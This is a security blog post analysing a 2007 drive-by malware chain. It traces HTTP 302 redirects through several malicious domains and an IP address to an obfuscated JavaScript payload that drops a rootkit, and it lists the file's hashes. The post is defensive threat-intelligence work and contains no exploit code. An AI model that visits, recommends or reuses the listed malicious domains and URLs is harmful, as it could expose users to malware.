<div style='background-color: none transparent;'></div>
Home » » Exploits Serving Domains

Exploits Serving Domains

More cyber leads from the previous analysis of Mpack embedded dekalab.info with a particular malicious domains farm emphasis as follows. Multiple redirectors, blackhat SEO, XOR-ifying javascript obfuscation and a piece of rootkit installed, pretty much everything's in place as usual. The majority of redirectors are part of an exploit serving domains farm. The whole process starts from trancer.biz :

trancer.biz/sys/index.php
81.95.149.176
HTTP/1.1 302 Found
Server: nginx/0.5.17
Date: Tue, 26 Jun 2007 11:51:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: cawajanga.biz/ts/in.cgi?oscorp

HTTP/1.1 302 Found
Server: nginx/0.5.17
Date: Tue, 26 Jun 2007 11:51:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: blooded.biz/2103/index.php

Then we get redirected to blooded.biz's obfuscated payload
81.95.149.176 in between loading cawajanga.biz/ts/in.cgi?oscorp and mobi-info.ru where the deobfuscated XOR-ifying javascript leads us to the exact payload location the output of which is in the form of Rootkit.Win32.Agent.fb

File size: 7503 bytes
MD5: 09994afd14b189697a039937f05f440f
SHA1: b9832689aa1272f39959087df41cea13fc283910
Share this article :
 
Copyright © 2011. Dancho Danchev's Blog - Mind Streams of Information Security Knowledge . All Rights Reserved
Company Info | Contact Us | Privacy policy | Term of use | Widget | Advertise with Us | Site map
Template Modify by Creating Website. Inpire by Darkmatter Rockettheme Proudly powered by Blogger